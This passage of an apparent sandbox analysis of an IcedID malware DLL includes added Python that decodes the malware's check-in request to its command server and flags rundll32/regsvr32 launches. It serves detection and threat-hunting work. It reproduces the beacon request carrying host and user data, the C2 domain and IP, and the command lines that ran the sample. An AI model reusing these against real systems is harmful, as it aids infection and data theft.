              Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
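All four sessions above are the same shape: a bare "GET /" to ilekvoyn.com with no User-Agent, a Cookie header carrying six Google-Analytics-looking names (__gads, _gat, _ga, _u, __io, _gid), and a 404 reply whose Server header says nginx while the body claims "Apache Server at ilekvoyn.com Port 80", a mismatch that marks the page as a canned response rather than a real web server error. The following is an added example, not part of the Joe Sandbox report: it parses such a request, hex-decodes the colon-separated _u fields (in session 0 they decode to "210979", "hardz" and "839C8FFC6E251505"), flags the missing User-Agent plus full cookie set as a check-in, and works out which cookie names stay constant across the four sessions so an analyst knows which ones can serve as a per-host key. The request text is reproduced from session 0 and the four Cookie values from sessions 0 to 3; reading _gat as the Windows version string and the first two _u fields as host and user name follows public IcedID write-ups and is an assumption here, not something the report states.

```python
from typing import Dict, List, Set, Tuple

# Request reproduced from HTTP session 0 of the report (request line and headers
# only; the sandbox shows no User-Agent header and no body).
SESSION0_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; "
    "_u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997\r\n"
    "Host: ilekvoyn.com\r\n"
    "\r\n"
)

# Cookie values of sessions 0..3 exactly as they appear in the report.
REPORT_COOKIES = [
    "__gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997",
    "__gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:31323037463731444444363041413743; __io=0; _gid=67AFED4C8997",
    "__gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:45324342413344443837343036393933; __io=0; _gid=67AFED4C8997",
    "__gads=109932505:1:3929:119; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:37383344384639433838463446394437; __io=0; _gid=67AFED4C8997",
]

# The six cookie names the beacon sets; all of them together on a bare "GET /"
# with no User-Agent is the detection condition used below.
BEACON_COOKIES = ("__gads", "_gat", "_ga", "_u", "__io", "_gid")


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split an HTTP/1.1 request head into the request line and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only: cookie values contain colons
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_cookie(value: str) -> Dict[str, str]:
    """Parse a Cookie header value into name -> value (first occurrence wins)."""
    cookies: Dict[str, str] = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name and name not in cookies:
            cookies[name] = val
    return cookies


def decode_u(value: str) -> List[str]:
    """Hex-decode each colon-separated chunk of _u; chunks that are not valid
    hex-encoded ASCII are returned unchanged."""
    fields: List[str] = []
    for chunk in value.split(":"):
        try:
            fields.append(bytes.fromhex(chunk).decode("ascii"))
        except ValueError:                      # covers bad hex and non-ASCII bytes
            fields.append(chunk)
    return fields


def triage(raw: str) -> Dict[str, object]:
    """Flag an IcedID-style check-in: bare GET /, no User-Agent, all six cookies."""
    request_line, headers = parse_request(raw)
    cookies = parse_cookie(headers.get("cookie", ""))
    findings: List[str] = []
    if "user-agent" not in headers:
        findings.append("no User-Agent header")
    if request_line.startswith("GET / ") and all(k in cookies for k in BEACON_COOKIES):
        findings.append("check-in cookie set present (" + ", ".join(BEACON_COOKIES) + ")")
    return {
        "host": headers.get("host"),
        "cookies": cookies,
        "os_version": cookies.get("_gat"),      # assumption: _gat carries the Windows build
        "u_fields": decode_u(cookies.get("_u", "")),   # assumption: host, user, per-request value
        "findings": findings,
        "suspicious": len(findings) == 2,
    }


def stable_cookie_fields(cookie_values: List[str]) -> Set[str]:
    """Cookie names whose value is identical in every request; these are the
    fields usable as a per-host cluster key, the others change per beacon."""
    parsed = [parse_cookie(v) for v in cookie_values]
    if not parsed:
        return set()
    return {n for n in parsed[0] if all(p.get(n) == parsed[0][n] for p in parsed)}


if __name__ == "__main__":
    print(triage(SESSION0_REQUEST))
    print(sorted(stable_cookie_fields(REPORT_COOKIES)))
```

On the report's four requests only _gat, __io and _gid are constant; __gads, _ga and the third _u field change between beacons, so a network signature should key on the cookie names and the missing User-Agent rather than on any of those values.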



              Target ID:0
              Start time:21:00:34
              Start date:23/05/2022
              Path:C:\Windows\System32\loaddll64.exe
              Wow64 process (32bit):false
              Commandline:loaddll64.exe "C:\Users\user\Desktop\J5V5DR.dll"
              Imagebase:0x7ff6f9500000
              File size:140288 bytes
              MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:1
              Start time:21:00:34
              Start date:23/05/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Imagebase:0x7ff705dc0000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:21:00:35
              Start date:23/05/2022
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
              Imagebase:0x7ff6f0b50000
              File size:24064 bytes
              MD5 hash:D78B75FC68247E8A63ACBA846182740E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:3
              Start time:21:00:35
              Start date:23/05/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Imagebase:0x7ff6d8f90000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:4
              Start time:21:00:35
              Start date:23/05/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer
              Imagebase:0x7ff6d8f90000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:5
              Start time:21:00:39
              Start date:23/05/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE
              Imagebase:0x7ff6d8f90000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:8
              Start time:21:00:43
              Start date:23/05/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu
              Imagebase:0x7ff6d8f90000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
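The process list above is the endpoint-side view of the same incident: every execution path goes through regsvr32.exe or rundll32.exe loading a DLL from the user's Desktop, the regsvr32 instance is started with /s (silent) and is the one that later talks to ilekvoyn.com, and one rundll32 call uses an ordinal export (,#1). The following detection logic is an added example, not from the report or Joe Sandbox; it runs three command-line rules over process events reconstructed from the Target entries and joins them with a network event reconstructed from the HTTP sessions. The report's Target IDs are used as the join key because it does not list a PID for every process; a real pipeline would join on PID or process GUID, and the events are constructed, not a log format any product emits.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    target_id: int          # join key; stands in for a PID/GUID here
    image: str
    cmdline: str


@dataclass(frozen=True)
class NetEvent:
    target_id: int
    image: str
    dst_ip: str
    dst_port: int
    host: str


# Constructed from the report's Target list (IDs 0..5 and 8) and its HTTP sessions.
PROC_EVENTS = [
    ProcEvent(0, r"C:\Windows\System32\loaddll64.exe", r'loaddll64.exe "C:\Users\user\Desktop\J5V5DR.dll"'),
    ProcEvent(1, r"C:\Windows\System32\cmd.exe", r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1'),
    ProcEvent(2, r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll"),
    ProcEvent(3, r"C:\Windows\System32\rundll32.exe", r'rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1'),
    ProcEvent(4, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer"),
    ProcEvent(5, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE"),
    ProcEvent(8, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu"),
]
NET_EVENTS = [
    NetEvent(2, r"C:\Windows\System32\regsvr32.exe", "64.227.182.2", 80, "ilekvoyn.com"),
]

LOLBINS = {"rundll32.exe", "regsvr32.exe"}
DLL_ARG = re.compile(r'"?([A-Za-z]:\\[^"]*?\.dll)"?', re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|ProgramData|Public)\\", re.IGNORECASE)
ORDINAL_EXPORT = re.compile(r'\.dll"?,#\d+', re.IGNORECASE)
SILENT_FLAG = re.compile(r"(?i)(^|\s)/s(\s|$)")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate_process(ev: ProcEvent) -> List[str]:
    """Command-line rules for a single process event; empty list means benign."""
    hits: List[str] = []
    image = basename(ev.image)
    if image not in LOLBINS:
        return hits
    m = DLL_ARG.search(ev.cmdline)
    dll = m.group(1) if m else ""
    if dll and USER_WRITABLE.search(dll):
        hits.append("lolbin_loads_dll_from_user_writable_path")
    if image == "regsvr32.exe" and SILENT_FLAG.search(ev.cmdline):
        hits.append("regsvr32_silent_register")
    if ORDINAL_EXPORT.search(ev.cmdline):
        hits.append("rundll32_ordinal_export")
    return hits


def correlate(procs: List[ProcEvent], nets: List[NetEvent]) -> Dict[int, dict]:
    """Keep processes with at least one rule hit and attach any outbound
    connection made by the same LOLBIN process; that join is what turns a noisy
    rundll32/regsvr32 alert into a high-confidence one."""
    out: Dict[int, dict] = {}
    for p in procs:
        hits = evaluate_process(p)
        if hits:
            out[p.target_id] = {"image": basename(p.image), "hits": hits, "network": []}
    for n in nets:
        if basename(n.image) in LOLBINS and n.target_id in out:
            out[n.target_id]["network"].append("%s (%s:%d)" % (n.host, n.dst_ip, n.dst_port))
            out[n.target_id]["hits"].append("lolbin_network_connection")
    return out


if __name__ == "__main__":
    for tid, finding in sorted(correlate(PROC_EVENTS, NET_EVENTS).items()):
        print(tid, finding)
```

The cmd.exe wrapper (Target 1) is deliberately not alerted on by itself: its child rundll32 (Target 3) carries the same command line and is the process that actually loads the DLL, so alerting on the child avoids a duplicate. The sandbox-only loaddll64.exe launcher is likewise ignored since it never appears on a real endpoint.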

              No disassembly